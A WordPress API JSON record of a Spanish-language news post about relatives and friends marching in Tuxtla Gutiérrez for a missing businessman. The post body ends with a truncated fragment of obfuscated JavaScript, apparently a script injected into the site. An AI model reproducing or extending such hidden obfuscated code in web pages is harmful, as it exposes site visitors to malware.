{"id":13115,"date":"2023-12-08T06:05:17","date_gmt":"2023-12-08T06:05:17","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=13115"},"modified":"2023-12-08T06:05:18","modified_gmt":"2023-12-08T06:05:18","slug":"piden-ayuda-pata-localizar-a-empresario-desaparecido-en-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=13115","title":{"rendered":"Piden ayuda pata localizar a empresario desaparecido en Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"771\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1702015402366-771x1024.jpg\" alt=\"\" class=\"wp-image-13116\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1702015402366-771x1024.jpg 771w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1702015402366-226x300.jpg 226w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1702015402366-768x1020.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1702015402366.jpg 1080w\" sizes=\"auto, (max-width: 771px) 100vw, 771px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudano, 7 de diciembre del 2023. Tuxtla Guti\u00e9rrez. &#8211; Familiares y amigos de Carlos Amadeo Moguel Aguirre, empresario desaparecido este 6 de diciembre por la tarde en Tuxtla Guti\u00e9rrez, realizaron una movilizaci\u00f3n para pedir apoyo para su localizaci\u00f3n.Esta movilizaci\u00f3n parti\u00f3 del puente de colores hacia el centro de la ciudad, para pedir a las autoridades llevar a cabo las acciones necesarias que lleven a su localizaci\u00f3n.&#8221;Tuxtlecos y tuxtlecas nos movilicemos; ma\u00f1ana podemos ser nosotros los que no lleguemos a nuestros hogares&#8221;, precisaron los familiares.&#8221;Todos somos Amadeo, presentaci\u00f3n con vida de Amadeo Moguel&#8221;, plasmaron en las cartulinas que llevaban en la protesta.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudano, 7 de diciembre del 2023. Tuxtla Guti\u00e9rrez. &#8211; Familiares y amigos de Carlos Amadeo Moguel Aguirre, empresario desaparecido este 6 de diciembre por la tarde en Tuxtla Guti\u00e9rrez, realizaron una movilizaci\u00f3n para pedir apoyo para su localizaci\u00f3n.Esta movilizaci\u00f3n parti\u00f3 del puente de colores hacia el centro de la ciudad, para pedir a &hellip;<\/p>\n","protected":false},"author":2,"featured_media":13116,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-13115","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13115","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13115"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13115\/revisions"}],"predecessor-version":[{"id":13117,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13115\/revisions\/13117"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/13116"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13115"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13115"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13115"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}